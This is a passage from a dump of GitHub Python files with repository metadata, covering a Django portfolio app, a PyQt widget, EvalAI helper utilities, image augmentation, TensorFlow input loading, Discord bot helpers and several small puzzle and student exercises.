'portfolio/contacto/contacto_login.html', {\n 'message': 'Credenciais invalidas'\n })\n return render(request, 'portfolio/contacto/contacto_login.html')\n\n\ndef logout_contacto(request):\n logout(request)\n return redirect('portifolio:contacto_full')\n\n\ndef contacto_todos_formularios(request):\n formularios = Contato.objects.all()\n context = {\n 'formularios': formularios\n }\n return render(request, 'portfolio/contacto/contacto_todos_formularios.html', context)\n\n\n# Projetos------------------------------------------------\ndef projetos_full(request):\n projetos = Projeto.objects.all()\n context = {\n 'projetos': projetos\n }\n return render(request, 'portfolio/projetos/projetos_full.html', context)\n\n\n@login_required\ndef criar_projeto(request):\n if request.method == 'POST':\n form = ProjetoForm(request.POST, request.FILES)\n if form.is_valid():\n projeto = form.save()\n return redirect('portifolio:detalhes_projeto', pk=projeto.pk)\n else:\n form = ProjetoForm()\n return render(request, 'portfolio/projetos/criar_projeto.html', {'form': form})\n\n\n@login_required\ndef editar_projeto(request, pk):\n projeto = get_object_or_404(Projeto, pk=pk)\n if request.method == 'POST':\n form = ProjetoForm(request.POST, instance=projeto)\n if form.is_valid():\n form.save()\n return redirect('portifolio:detalhes_projeto', pk=projeto.pk)\n else:\n form = ProjetoForm(instance=projeto)\n return render(request, 'portfolio/projetos/editar_projeto.html',\n {'form': form, 'projeto': projeto})\n\n\n@login_required\ndef apagar_projeto(request, pk):\n projeto = get_object_or_404(Projeto, pk=pk)\n if request.method == 'POST':\n projeto.delete()\n return redirect('portifolio:projetos_full')\n return render(request, 'portfolio/projetos/apagar_projeto.html',\n {'projeto': projeto})\n\n\ndef detalhes_projeto(request, pk):\n projeto = get_object_or_404(Projeto, pk=pk)\n return render(request, 'portfolio/projetos/detalhes_projeto.html',\n {'projeto': projeto})\n\n\ndef login_projeto(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(request,\n username=username,\n password=password)\n\n if user is not None:\n login(request, user)\n return redirect('portifolio:projetos_full')\n else:\n # aqui\n return render(request, 'portfolio/projetos/login_projeto.html', {\n 'message': 'Credenciais invalidas'\n })\n return render(request, 'portfolio/projetos/login_projeto.html')\n\n\ndef logout_projeto(request):\n logout(request)\n\n return redirect('portifolio:projetos_full')\n\n\n# Skills (Sobre mim)----------------------\ndef skills(request):\n return render(request, 'portfolio/sobreMim/sobreMim_skills_folder/sobreMim_skills.html')\n\n# Testes------------------------------\ndef defesa(request):\n praia = Praia.objects.all()\n if request.method == 'POST':\n form = PraiaForm(request.POST, request.FILES)\n if form.is_valid():\n projeto = form.save()\n return redirect('portifolio:defesa', pk=projeto.pk)\n else:\n form = ProjetoForm()\n\n return render(request, 'portfolio/defesa/defesa.html')\n\n\ndef testeNav(request):\n return render(request, 'portfolio/base/testeNav.html')\n","repo_name":"felipegsi/a22103965-django-portifolio","sub_path":"portifolio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"21570115633","text":"from PyQt5.QtWidgets import (QHBoxLayout, QPushButton, QSizePolicy,\n\t\t\t\t\t\t\t QSpacerItem, QVBoxLayout, QWidget)\n\n\nclass FullWindowWidget(QWidget):\n\tdef __init__(self, parent, widget=None, layout=None):\n\t\tsuper().__init__()\n\t\tself.parent = parent\n\t\tself.main_window = parent.main_window\n\n\t\tif layout is None and widget is None:\n\t\t\traise Exception(\"Either layout or widget must be provided\")\n\n\t\tmain_layout = QVBoxLayout(self)\n\t\tmain_layout.setContentsMargins(0, 0, 0, 0)\n\t\tmain_layout.setSpacing(0)\n\n\t\t# Create header widget with close button\n\t\theader_widget = QWidget()\n\t\theader_layout = QHBoxLayout(header_widget)\n\t\theader_layout.setContentsMargins(4, 4, 4, 4)\n\n\t\tclose_button = QPushButton(\"Close\")\n\t\tclose_button.clicked.connect(self.destroy)\n\n\t\theader_layout.addItem(QSpacerItem(0, 0, QSizePolicy.Expanding, QSizePolicy.Minimum))\n\t\theader_layout.addWidget(close_button)\n\n\t\theader_widget.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Fixed)\n\t\tmain_layout.addWidget(header_widget)\n\n\t\t# Create body widget with the provided layout\n\t\tif widget is not None:\n\t\t\tmain_layout.addWidget(widget)\n\t\telse:\n\t\t\tbody_widget = QWidget()\n\t\t\tbody_widget.setLayout(layout)\n\t\t\tmain_layout.addWidget(body_widget)\n\n\tdef show(self):\n\t\tself.main_window.hide_main_layout()\n\t\tself.main_window.main_widget.setParent(None)\n\t\tself.main_window.setCentralWidget(self)\n\t\treturn\n\n\tdef destroy(self, *args, **kwargs):\n\t\tself.setParent(None)\n\t\tself.main_window.setCentralWidget(self.main_window.main_widget)\n\t\tself.main_window.show_main_layout()\n\t\treturn super().destroy(*args, **kwargs)\n","repo_name":"eimantaskat/minecraft-server-launcher","sub_path":"gui/widgets/full_window_widget.py","file_name":"full_window_widget.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"34416382876","text":"import json\nimport os\nimport sys\nimport zipfile\n\nfrom config import *\nfrom github import Github\n\n\ndef check_for_errors():\n \"\"\"\n Checks if any errors have been recorded so far during this workflow step and returns the error if so\n \"\"\"\n if os.getenv(\"CHALLENGE_ERRORS\") == \"False\":\n return True, None\n return False, os.getenv(\"CHALLENGE_ERRORS\")\n\n\ndef check_if_pull_request():\n \"\"\"\n Returns True if the workflow triggering event is a pull request\n \"\"\"\n if GITHUB_EVENT_NAME == \"pull_request\":\n return True\n return False\n\n\ndef check_if_merge_or_commit():\n \"\"\"\n Returns True if the workflow triggering event is either a merge or a direct commit\n \"\"\"\n if GITHUB_EVENT_NAME == \"push\":\n return True\n return False\n\n\ndef add_pull_request_comment(github_auth_token, repo_name, pr_number, comment_body):\n \"\"\"\n Adds a comment to a pull request\n Arguments:\n github_auth_token {str}: The auth token of the github user\n repo_name {str}: The name of the repository\n pr_number {int}: The Pull request number to add a comment\n comment_body {str}: The body of the comment\n \"\"\"\n try:\n client = Github(github_auth_token)\n repo = client.get_user().get_repo(repo_name)\n pull = repo.get_pull(pr_number)\n pull.create_issue_comment(comment_body)\n except Exception as e:\n print(\"There was an error while commenting on the Pull request: {}\".format(e))\n\n\ndef create_github_repository_issue(\n github_auth_token, repo_name, issue_title, issue_body\n):\n \"\"\"\n Creates an issue in a given repository\n \n Arguments:\n github_auth_token {str}: The auth token of the github user\n repo_name {str}: The name of the repository\n issue_title {int}: The title of the issue to be created\n issue_body {str}: The body of the issue to be created\n \"\"\"\n try:\n client = Github(github_auth_token)\n repo = client.get_user().get_repo(repo_name)\n issue = repo.create_issue(issue_title, issue_body)\n except Exception as e:\n print(\"There was an error while creating an issue: {}\".format(e))\n\n\ndef create_challenge_zip_file(challenge_zip_file_path, ignore_dirs, ignore_files):\n \"\"\"\n Creates the challenge zip file at a given path\n \n Arguments:\n challenge_zip_file_path {str}: The relative path of the created zip file\n ignore_dirs {list}: The list of directories to exclude from the zip file\n ignore_files {list}: The list of files to exclude from the zip file\n \"\"\"\n working_dir = (\n os.getcwd()\n ) # Special case for github. For local. use os.path.dirname(os.getcwd())\n\n # Creating evaluation_script.zip file\n eval_script_dir = working_dir + \"/evaluation_script\"\n eval_script_zip = zipfile.ZipFile(\n \"evaluation_script.zip\", \"w\", zipfile.ZIP_DEFLATED\n )\n for root, dirs, files in os.walk(eval_script_dir):\n for file in files:\n file_name = os.path.join(root, file)\n name_in_zip_file = (\n file_name[len(eval_script_dir) + 1 :]\n if file_name.startswith(eval_script_dir)\n else file_name\n )\n eval_script_zip.write(file_name, name_in_zip_file)\n eval_script_zip.close()\n\n # Creating the challenge_config.zip file\n zipf = zipfile.ZipFile(challenge_zip_file_path, \"w\", zipfile.ZIP_DEFLATED)\n for root, dirs, files in os.walk(working_dir):\n parents = root.split(\"/\")\n if not set(parents) & set(ignore_dirs):\n for file in files:\n if file not in ignore_files:\n file_name = os.path.join(root, file)\n name_in_zip_file = (\n file_name[len(working_dir) + 1 :]\n if file_name.startswith(working_dir)\n else file_name\n )\n zipf.write(file_name, name_in_zip_file)\n zipf.close()\n\n\ndef get_request_header(token):\n \"\"\"\n Returns user auth token formatted in header for sending requests\n \n Arguments:\n token {str}: The user token to gain access to EvalAI\n \"\"\"\n header = {\"Authorization\": \"Bearer {}\".format(token)}\n return header\n\n\ndef load_host_configs(config_path):\n \"\"\"\n Loads token to be used for sending requests\n \n Arguments:\n config_path {str}: The path of host configs having the user token, team id and the EvalAI host url\n \"\"\"\n config_path = \"{}/{}\".format(os.getcwd(), config_path)\n if os.path.exists(config_path):\n with open(config_path, \"r\") as f:\n try:\n data = f.read()\n except (OSError, IOError) as e:\n print(\"\\nAn error occured while loading the host configs: {}\".format(e))\n sys.exit(1)\n data = json.loads(data)\n host_auth_token = data[\"token\"]\n challenge_host_team_pk = data[\"team_pk\"]\n evalai_host_url = data[\"evalai_host_url\"]\n return [host_auth_token, challenge_host_team_pk, evalai_host_url]\n else:\n error_message = \"\\nThe host config json file is not present. Please include an auth token, team_pk & evalai_host_url in it: {}\".format(\n config_path\n )\n print(error_message)\n os.environ[\"CHALLENGE_ERRORS\"] = error_message\n return False\n\n\ndef validate_token(response):\n \"\"\"\n Function to check if the authentication token provided by user is valid or not\n \n Arguments:\n response {dict}: The response json dict sent back from EvalAI \n \"\"\"\n error = None\n if \"detail\" in response:\n if response[\"detail\"] == \"Invalid token\":\n error = \"\\nThe authentication token you are using isn't valid. Please generate it again.\\n\"\n print(error)\n os.environ[\"CHALLENGE_ERRORS\"] = error\n return False\n if response[\"detail\"] == \"Token has expired\":\n error = \"\\nSorry, the token has expired. Please generate it again.\\n\"\n print(error)\n os.environ[\"CHALLENGE_ERRORS\"] = error\n return False\n return True\n","repo_name":"Cloud-CV/EvalAI-Starters","sub_path":"github/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"42"} +{"seq_id":"7436624411","text":"#!/usr/bin/env python3\n\n\nps = [2, 3, 5, 7, 11, 13, 17]\n\n\ndef hasprop(n):\n for k in range(7):\n sl = int(str(n)[k + 1 : k + 4])\n if sl % ps[k]:\n return False\n\n return True\n\n\nsum = 0\n\n\ndef check(l):\n global sum\n n = int(''.join([str(k) for k in l]))\n if hasprop(n):\n print(n)\n sum += n\n\n\ndef forperm(l, f, t=[]):\n if l:\n for i in range(len(l)):\n p = t[:]\n p.append(l[i])\n l2 = l[:]\n del l2[i]\n forperm(l2, f, p)\n else:\n f(t)\n\n\nl = list(range(0, 10))\nforperm(l, check)\n\nprint(sum)\n","repo_name":"labuwx/progpuzzles","sub_path":"project_euler/pe43.py","file_name":"pe43.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"19145661755","text":"class BankAccount():\n\n def __init__(self, iban, acc_no, funds, recent_trans):\n self.iban = iban\n self.acc_no = acc_no\n self.funds = funds\n self.recent_trans = recent_trans\n\n def deposit(self):\n amount = float(input(\"Enter an amount to be deposited: \"))\n self.avail_funds += amount\n # if len(self.recent_trans) < 5:\n # self.recent_trans.pop(0)\n print(\"Amount deposited: \", amount)\n\n def withdraw(self):\n amount = float(input(\"Enter an amount to be withdrawn: \"))\n if self.avail_funds >= amount:\n self.avail_funds -= amount\n print(\"Amount withdrawn: \", amount)\n else:\n print(\"Insufficient Funds\")\n\n def display(self):\n print(\"Account Number:\", self.iban)\n print(\"Available Balance = \",self.avail_funds)\n\n\ns = BankAccount(\"IE64IRCE92050112345678\", \"2275409\", 1000, [])\n\ns.deposit()\ns.withdraw()\ns.display()\n","repo_name":"BearachB/Hello_World","sub_path":"Week 9/Lab 16 - Classes/lab16_q3b.py","file_name":"lab16_q3b.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"20404382610","text":"import cv2\nimport numpy as np\nfrom skimage import io, img_as_ubyte\nfrom skimage.transform import rotate, AffineTransform, warp\nfrom skimage.util import random_noise\nimport random\nimport os\nimport cv2\nimport matplotlib.pyplot as plt\nfrom skimage.exposure import rescale_intensity\nfrom skimage.segmentation import slic\nfrom skimage.util import img_as_float\nimport random\nimport csv\nimport xml.etree.ElementTree as ET\n\n\nif os.path.isdir('foto_simulador') == False:\n print('A pasta \"foto_simulador\" não existe. Criando diretório.')\nelse:\n print('A pasta \"foto_simulador\" existe.')\n images_path = os.getcwd() + '\\\\foto_simulador'\n\nif os.path.isdir('Aumented_Images') == False:\n print('A pasta \"Aumented_Images\" não existe. Criando diretório.')\n os.mkdir('Aumented_Images')\nelse:\n print('A pasta \"Aumented_Images\" existe.')\n augmented_path = os.getcwd() + '\\\\Aumented_Images'\n\nimages = []\nfor im in os.listdir(images_path):\n images.append(os.path.join(images_path, im))\nimages_to_generate = 80 # qtd de imagens que vai gerar\ni = 0 # variavel para inteirar no images_to_generate\n\n\ndef minmax(img2):\n # Create a black image\n #img = np.zeros((200,300,3), np.uint8)\n #cv2.rectangle(img,(xmin,ymin),(xmax,ymax),(255,255,255),-1)\n \n #MUDANCAS\n\n # Find Canny edges \n edged = cv2.Canny(img2, 200, 200) \n #cv2.imshow('img2', edged)\n #cv2.waitKey(0) \n \n # Finding Contours \n contours, hierarchy = cv2.findContours(edged, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE) \n \n for contour in contours:\n (x,y,w,h) = cv2.boundingRect(contour)\n #print(\"find\")\n #print(str(x) +'-'+str(y) +'-'+str(w+x) +'-'+str(y+h) )\n\n #print(\"Number of Contours found = \" + str((contours))) \n cf = contours\n # Draw all contours \n # -1 signifies drawing all contours \n #cv2.drawContours(img2, contours, -1, (0, 255, 0), 3) \n if (cf == []):\n x = 0\n y = 0\n w = 0\n h = 0\n\n #cv2.imshow('img2', img2)\n\n #cv2.waitKey(0) \n return(x, y, w+x, y+h)\n\n\ndef rotacao(image):\n # points for test.jpg\n cnt = np.array([\n [[350, 250]],\n [[200, 600]],\n [[400, 550]],\n [[660, 500]]\n ])\n \n rect = cv2.minAreaRect(cnt)\n \n\n # the order of the box points: bottom left, top left, top right,\n # bottom right\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n\n # get width and height of the detected rectangle\n width = int(rect[1][0])\n height = int(rect[1][1])\n\n src_pts = box.astype(\"float32\")\n # coordinate of the points in box points after the rectangle has been\n # straightened\n dst_pts = np.array([[0, height-1],\n [0, 0],\n [width-1, 0],\n [width-1, height-1]], dtype=\"float32\")\n\n # the perspective transformation matrix\n M = cv2.getPerspectiveTransform(src_pts, dst_pts)\n\n # directly warp the rotated rectangle to get the straightened rectangle\n warped = cv2.warpPerspective(image, M, (width, height))\n\n return warped\n \n\ndef hrz_vira(image):\n\n#Função responsável por fazer a inversão horizontal da imagem.\n#Entrada: Imagem\n#Saída: Imagem invertida no sentido horizontal\n\n return np.fliplr(image)\n\ndef vtc_vira(image):\n\n#Função responsável por fazer a inversão vertical da imagem.\n#Entrada: Imagem\n#Saída: Imagem invertida no sentido vertical\n\n return np.flipud(image)\n\ndef ruidos_img(image):\n\n#Função responsável por inserir ruídos randomincos do tipo sal e pimenta na imagem.\n#Entrada: Imagem\n#Saída: Imagem com ruidos do tipo sal e pimenta\n\n #return random_noise(image)\n row,col,ch = image.shape\n s_vs_p = 0.5\n amount = 0.05\n out = np.copy(image)\n # Salt mode\n num_salt = np.ceil(amount * image.size * s_vs_p)\n coords = [np.random.randint(0, i - 1, int(num_salt))\n for i in image.shape]\n out[coords] = 1\n\n # Pepper mode\n num_pepper = np.ceil(amount* image.size * (1. - s_vs_p))\n coords = [np.random.randint(0, i - 1, int(num_pepper))\n for i in image.shape]\n out[coords] = 0\n #cv2.imshow('blabs', out)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n return out\n\ndef brilhoo(image):\n\n#Função responsável por incrementar brilho a imagem.\n#Entrada: Imagem\n#Saída: Imagem com brilho\n\n brilhin = np.ones(image.shape, dtype=\"uint8\") * 70\n aumentabrilho = cv2.add(image, brilhin)\n return aumentabrilho\n\ndef blur_img(image):\n\n#Função responsável por aplicar um filtro mediana na imagem.\n#Entrada: Imagem\n#Saída: Imagem com filtro mediana\n\n k_size = random.randrange(1,10,2)\n img_blur = cv2.medianBlur(image, k_size)\n return img_blur\n\ndef zoom(image):\n\n#Função responsável por aplicar zoom na imagem.\n#Entrada: Imagem\n#Saída: Imagem com zoom\n\n zoom_value = random.random()\n hidth, width = image.shape[:2]\n h_taken = int(zoom_value*hidth)\n w_taken = int(zoom_value*width)\n h_start = random.randint(0, hidth-h_taken)\n w_start = random.randint(0, width-w_taken)\n image = image[h_start:h_start+h_taken, w_start:w_start+w_taken, :]\n image = cv2.resize(image, (hidth, width), cv2.INTER_CUBIC)\n return image\n\n# Dicionario para ativar as funcoes\ntransformations = {'Rotacao': rotacao,\n 'Horizontal flip': hrz_vira,\n 'Vertical flip': vtc_vira,\n 'Ruidos': ruidos_img,\n 'Brilho': brilhoo,\n 'Blur Image': blur_img,\n 'Zoom': zoom\n }\n\n\n\ndata = []\nwhile i < images_to_generate:\n x = random.randrange(146)\n\n arquivo = ET.parse(images[1])\n\n if x == 0:\n x = x + 1\n arquivo = ET.parse(images[x])\n if x % 2 != 0:\n arquivo = ET.parse(images[x])\n else:\n x = x + 1\n arquivo = ET.parse(images[x])\n\n print (x)\n bla = arquivo.getroot()\n\n numeros = bla.findall(\"object/bndbox\")\n xmin = 0\n ymin = 0\n xmax = 0\n ymax = 0\n\n for item in numeros:\n xmin = int(item.find(\"xmin\").text)\n ymin = int(item.find(\"ymin\").text)\n xmax = int(item.find(\"xmax\").text)\n ymax = int(item.find(\"ymax\").text)\n \n\n print(xmin, ymin, xmax, ymax)\n\n image = images[x - 1]\n original_image = io.imread(image)\n transformed_image = []\n n = 0 # variável para iterar até o número de transformação\n\n height, width, channels = original_image.shape\n # imagemm - cria uma img preta com um bounding no lugar q deveria estar na imagem da pista\n imagemm = np.zeros((height,width,channels), np.uint8)\n cv2.rectangle(imagemm,(xmin,ymin),(xmax,ymax),(255,255,255),-1)\n\n #cv2.imshow('img1', imagemm)\n #cv2.waitKey(0)\n# escolha um número aleatório de transformação para aplicar na imagem\n transformation_count = random.randint(1, len(transformations))\n \n while n <= transformation_count:\n # Escolha aleatorio do metodo a ser aplicado\n key = random.choice(list(transformations))\n print(key)\n transformed_image = transformations[key](original_image)\n #print(transformed_image.dtype)\n # faz as mesmas transformacoes na imagem preta\n img2 = transformations[key](imagemm)\n\n # mean normalization\n image = transformed_image.astype(np.float32) / 255\n image -= image.mean()\n image /= image.std()\n transformed_image = transformed_image.astype(np.uint8)\n transformed_image = np.round(transformed_image).astype(np.uint8)\n\n n += 1\n \n\n #cv2.imshow('blabs', transformed_image)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n \n\n nome = \"augmented_image_%s.jpg\" % (i)\n new_image_path = \"%s/augmented_image_%s.jpg\" % (augmented_path, i)\n # Converta uma imagem para o formato de byte sem sinal, com valores em [0, 255].\n transformed_image = img_as_ubyte(transformed_image)\n img2 = img_as_ubyte(img2)\n #cv2.imshow('blabs', transformed_image)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n\n # converter a imagem antes de gravar\n transformed_image = cv2.cvtColor(transformed_image, cv2.COLOR_BGR2RGB)\n img2 = cv2.cvtColor(img2, cv2.COLOR_BGR2RGB)\n #cv2.imshow('blabs', transformed_image)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n \n \n # Salvar a imagem ja convertida\n cv2.imwrite(new_image_path, transformed_image)\n i = i+1\n height, width, channels = transformed_image.shape\n\n # chama a funcao que vai retornar o x & y min e max do bounding\n xmin, ymin, xmax, ymax = minmax(img2)\n \n # elemento da lista data[] que armazena as informacoes da imagem transformada\n tentativa = (nome, height, width, 'pista', xmin, ymin, xmax, ymax)\n \n #acrescenta \"tentativa\" a lista data[] (cada imagem gera uma tentativa diferente q e acrescido a data)\n data.append(tentativa)\n\n #cv2.imshow('img2', img2)\n #cv2.waitKey(0) \n\n# cria o documento csv que armazena os dados por imagem\nwith open('teste.csv', \"w\", newline='') as file:\n writer = csv.writer(file)\n writer.writerow([\"filename\", \"width\", \"height\", \"class\", \"xmin\", \"ymin\", \"xmax\", \"ymax\"])\n writer.writerows(data) \n","repo_name":"gmiserani/aumented_Images","sub_path":"images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":9173,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"29811237416","text":"# a simple parser for python. use get_number() and get_word() to read\ndef parser():\n while 1:\n data = list(input().split(' '))\n for number in data:\n if len(number) > 0:\n yield(number) \n\ninput_parser = parser()\n\ndef get_word():\n global input_parser\n return next(input_parser)\n\ndef get_number():\n data = get_word()\n try:\n return int(data)\n except ValueError:\n return float(data)\n\n# numpy and scipy are available for use\n\ndef is_possible(arr, n, m, curr_min):\n\tstudentsrequired = 1\n\tcurr_sum = 0\n\tfor i in range(n):\n\t\tif (arr[i] > curr_min):\n\t\t\treturn False\n\t\tif (curr_sum + arr[i] > curr_min):\n\t\t\tstudentsrequired += 1\n\t\t\tcurr_sum = arr[i]\n\t\t\tif (studentsrequired > m):\n\t\t\t\treturn False\n\t\telse:\n\t\t\tcurr_sum += arr[i]\n\treturn True\ndef findpages(arr, n, m):\n\tsum1 = 0\n\tif (n < m):\n\t\treturn -1\n\tfor i in range(n):\n\t\tsum1 += arr[i]\n\tstart, end = 0, sum1\n\tresult = 10**9\n\twhile (start <= end):\n\t\tmid = (start + end) // 2\n\t\tif (is_possible(arr, n, m, mid)):\n\t\t\tresult = mid\n\t\t\tend = mid - 1\n\t\telse:\n\t\t\tstart = mid + 1\n\treturn result\nn,m = map(int, input().split())\narr = []\nfor i in range(n):\n arr.append(2**get_number())\nprint(findpages(arr, n, m))","repo_name":"ashish159565/PYTHON","sub_path":"IEEE Extreme/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"41802052254","text":"import requests\nimport time\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\ntime_now = time.localtime(time.time())\nH = int(time_now.tm_hour)\nurl_code = input()\n\nwhile True :\n if(H == 16):\n url = \"https://finance.naver.com/item/main.nhn?code=\" + url_code\n result = requests.get(url)\n bs_obj = BeautifulSoup(result.content, \"html.parser\")\n no_today = bs_obj.find(\"p\", {\"class\": \"no_today\"}) # 태그 p, 속성값 no_today 찾기\n 0\n now_price = no_today.text\n \n print(now_price)\n print(today_)\n f = open(\"주식가격.txt\",\"w+\")\n f.write(\"\\n\")\n f.write(today_)\n f.write(\"\\n\")\n f.write(now_price)\n f.close()\n \n \n\n","repo_name":"WhiteHerb/stockdata","sub_path":"주식_2-test.py","file_name":"주식_2-test.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"28425101931","text":"number = int(input(\"What number: \"))\n\n#construct spiral\nspiral = []\nspiral.append([1])\n\nring_lev = 1\nnum = 2\nwhile num <= number:\n ring = []\n while len(ring) < ring_lev * 8:\n ring.append(num)\n num += 1\n ring_lev += 1\n spiral.append(ring)\n\ndef Manhat_Dis(a):\n for i in a:\n if number in i:\n x = a.index(i)\n y = i.index(number)+1\n\n return x + abs((x) - ((y) % (x*2))) \n\nprint(Manhat_Dis(spiral))\n","repo_name":"MxMossy/aoc2017","sub_path":"3_day.py","file_name":"3_day.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"4428187668","text":"#coding:utf-8\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\ndef get_files(file_dir):\n image = []\n label = []\n if not os.path.exists(file_dir):\n print(\"{} is not exits.\".format(file_dir))\n exit()\n file = open(file_dir,'r')\n root = 'C:/Users/zanghao/Desktop/公司/yi/In-shop_Clothes_Retrieval_Benchmark/img/'\n for line in file:\n temp = line.strip('\\n').split()\n image.append(root+temp[0])\n label.append(temp[1])\n temp = np.array([image,label])\n temp = temp.transpose()\n np.random.shuffle(temp)\n image_list = list(temp[:,0])\n label_list = list(temp[:,1])\n #label_list = [int(i.split('0')[]) for i in label_list]\n return image_list,label_list\n\ndef get_batch(image,label,image_W,image_H,batch_size,capacity):\n\n image = tf.cast(image,tf.string)\n label = tf.cast(label,tf.string)\n #generate input queue\n input_queue = tf.train.slice_input_producer([image,label])\n label = input_queue[1]\n image_contents = tf.read_file(input_queue[0])\n image = tf.image.decode_jpeg(image_contents,channels=3)\n image = tf.image.resize_image_with_crop_or_pad(image,image_W,image_H)\n image = tf.image.per_image_standardization(image)\n image_batch,label_batch = tf.train.batch([image,label],\n batch_size=batch_size,\n num_threads=32,\n capacity=capacity)\n label_batch = tf.reshape(label_batch,[batch_size])\n image_batch = tf.cast(image_batch,tf.float32)\n\n return image_batch,label_batch\n\ndef build_input():\n BATCH_SIZE = 1\n CAPACITY = 256\n IMG_W = 256\n IMG_H = 256\n file_dir = 'C:/Users/zanghao/Desktop/公司/yi/In-shop_Clothes_Retrieval_Benchmark/Eval/train.txt'\n image_list, label_list = get_files(file_dir)\n image_batch, label_batch = get_batch(image_list,label_list,IMG_W,IMG_H,BATCH_SIZE,CAPACITY)\n label_batch = tf.zeros([BATCH_SIZE, 1])\n return image_batch,label_batch\n\n\ndef main():\n BATCH_SIZE = 2\n CAPACITY = 256\n IMG_W = 256\n IMG_H = 256\n file_dir = 'C:/Users/zanghao/Desktop/公司/yi/In-shop_Clothes_Retrieval_Benchmark/Eval/train.txt'\n image_list, label_list = get_files(file_dir)\n image_batch, label_batch = get_batch(image_list,label_list,IMG_W,IMG_H,BATCH_SIZE,CAPACITY)\n with tf.Session() as sess:\n i = 0\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n try:\n while not coord.should_stop() and i<2:\n img,label = sess.run([image_batch,label_batch])\n for j in np.arange(BATCH_SIZE):\n print('label: %s' %label[i])\n plt.imshow(img[j,:,:,:])\n plt.show()\n i+=1\n except tf.errors.OutOfRangeError:\n print ('done')\n finally:\n coord.request_stop()\n coord.join(threads)\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"ZBYuan0813/tensorflow-train-resnet","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40147330968","text":"import json\r\nimport discord\r\nimport os\r\nimport csv\r\n\r\n#Check if the user is an administrator.\r\nasync def checkAdmin(person):\r\n for r in person.roles:\r\n if r.permissions.administrator:\r\n return True\r\n return False\r\n\r\n#Checks if a specific user has a role.\r\nasync def checkRole(person, role):\r\n if role == \"everyone\":\r\n return True\r\n\r\n for r in person.roles:\r\n if r.name == role:\r\n return True\r\n return False\r\n\r\n#Load a JSON file.\r\nasync def loadJSON(location):\r\n with open(location, 'rt') as f:\r\n configData = json.load(f)\r\n f.close()\r\n return configData\r\n\r\n#Overwrite a JSON file.\r\nasync def overwriteJSON(location, newConfig):\r\n os.remove(location)\r\n with open(location, 'w') as f:\r\n json.dump(newConfig, f)\r\n f.close()\r\n\r\n#Load a CSV file.\r\nasync def loadCSV(location):\r\n with open(location, 'rt') as f:\r\n donateData = csv.reader(f)\r\n return reversed(list(donateData))\r\n\r\n#Get a users specific role.\r\nasync def getRole(client, message, roleName):\r\n for server in client.servers:\r\n if server == message.server:\r\n for role in server.roles:\r\n if roleName == role.name:\r\n return role\r\n return 0\r\n\r\n#Create a role.\r\nasync def createRole(client, message, rolename):\r\n for server in client.servers:\r\n if server == message.server:\r\n numRoles = len(server.roles)\r\n\r\n newRole = await client.create_role(message.server, permissions=discord.Permissions.none(), name=rolename)\r\n await client.move_role(message.server, newRole, numRoles)\r\n return newRole\r\n","repo_name":"ShaneNolan/Black-Bot","sub_path":"library/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"10246587634","text":"import time, os\n\nfrom discord.ext import commands\nimport discord\n\nfrom Helper import Helper\n\nimport asyncio\nimport requests\ntry:\n from decouple import config\n voicerssKey = config('voice')\n ibmkey = config('ibmkey')\n\nexcept ImportError:\n voicerssKey = os.environ['voice']\n ibmkey = os.environ['ibmkey']\n\n\nvoicesString = \"Dinis\\nMarcia\\nLigia\\nYara\\nLeonor\\nIsabela\"\n\ndef getVoice(output, voz=\"Isabela\"):\n if voz == \"Isabela\":\n from ibm_watson import TextToSpeechV1\n from ibm_cloud_sdk_core.authenticators import IAMAuthenticator\n\n path = f\"temp.mp3\"\n voice = \"pt-BR_IsabelaV3Voice\"\n url = \"https://api.us-south.text-to-speech.watson.cloud.ibm.com/\"\n\n tts = TextToSpeechV1(authenticator=IAMAuthenticator(ibmkey))\n tts.set_service_url(url)\n r = tts.synthesize(output, accept=\"audio/mp3\", voice=voice).get_result()\n else:\n\n lang = \"pt-pt\" if voz == \"Leonor\" else \"pt-br\"\n url = f\"http://api.voicerss.org/?key={voicerssKey}&hl={lang}&v={voz}&c=MP3&src={output}&f=12khz_16bit_stereo\" \n r = requests.get(url, stream=True)\n \n path = Helper.get_epoch_filename(\"mp3\")\n\n if r.status_code == 200:\n with open(path, 'wb') as f:\n for chunk in 